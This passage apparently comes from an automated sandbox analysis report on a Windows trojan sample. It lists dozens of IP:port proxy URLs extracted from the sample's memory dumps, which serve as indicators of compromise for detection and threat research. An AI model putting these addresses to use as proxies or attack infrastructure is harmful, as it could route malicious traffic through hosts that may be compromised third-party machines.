                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.12.201.56:11337://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.145.93.115:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.145.93.115:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76C8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C767D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.172.122.14:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C80C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.172.122.14:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.182.153.29:12000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.182.153.29:12000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C692A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.182.183.154:7497://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.182.183.154:7497xD
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.182.210.152
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.182.210.152://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.21.170:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.196.21.170:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.198.181.50:49582
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.198.181.50:49582://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.199.151.6:84
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.199.151.6:84://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.199.151.94:82
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.199.151.94:82://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA75A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.28.117:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA60E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.28.117:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.30.227:6565
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.30.227:6565://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.73.251:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.73.251:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.74.130:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.219.74.130:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C947E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.52.247.77:1981
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C950C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.52.247.77:1981://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.88.66.153:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://217.88.66.153:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.1.200.244:57114
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.1.200.244:57114://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.145.131.182:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA623000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.145.131.182:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.2.112.243
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.2.112.243://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.2.112.243:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.23.15.154:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.23.15.154:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.252.244.126
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC722000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.252.244.126://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.252.244.126:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.255.187.60
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.255.187.60://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.255.187.60:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.57.210.186:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.57.210.186:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.75.102.198:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.75.102.198:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.75.69.50:57903
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.75.69.50:57903://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.91.158.230:7302
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://218.91.158.230:7302://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.243.212.118:8443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.243.212.118:8443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.73.88.167
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.73.88.167://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://219.73.88.167:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.194.189.144:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.194.189.144:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.247.162.70:9990
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.247.162.70:9990://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.247.162.70:9990P
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.248.70.237:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.248.70.237:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.67.2.2
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.67.2.2://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://220.67.2.2:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.134.152.75:7302
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.134.152.75:7302://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9156000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.151.181.101:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7F7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.151.181.101:8000://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.153.92.39
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA514000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.153.92.39://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.153.92.39:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.153H
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.2.84.42:10800
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.2.84.42:10800://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.211.62.4:1111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.211.62.4:1111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC04D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.225.152.167:24166
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC04D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.225.152.167:24166://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.226.109.229:7302
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.226.109.229:7302://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.230.7.39:9000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.230.7.39:9000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.231.32.80:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.231.32.80:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.231.32.80:9002x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.6.139.190:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://221.6.139.190:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.104.128.205:48678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.104.128.205:48678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.111.18.67
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.111.18.67://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.111.18.67:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.124.130.196:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.124.130.196:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.124.193.114:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.124.193.114:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.124.29.59:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.124.29.59:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C81FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.129.38.21:57114
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.129.38.21:57114://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.165.223.139:41541
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.165.223.139:41541://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.220.102.159:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.220.102.159:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.241.144.17:2080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.241.144.17:2080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.243.201.153:9992
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.243.201.153:9992://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.254.119.8:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.254.119.8:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.255.238.159
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.255.238.159://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9499000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.255.238.159:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.74.65.84:38051
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.74.65.84:38051://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D06000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.88.167.22:9002
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.88.167.22:9002://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.95.242.184:4134
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://222.95.242.184:4134://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEB2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.112.53.2:1025
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.112.53.2:1025://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.113.80.158:9091
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.113.80.158:9091://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.113.89.138:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.113.89.138:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.13.124.24:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.13.124.24:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://223.18.60.191:8080
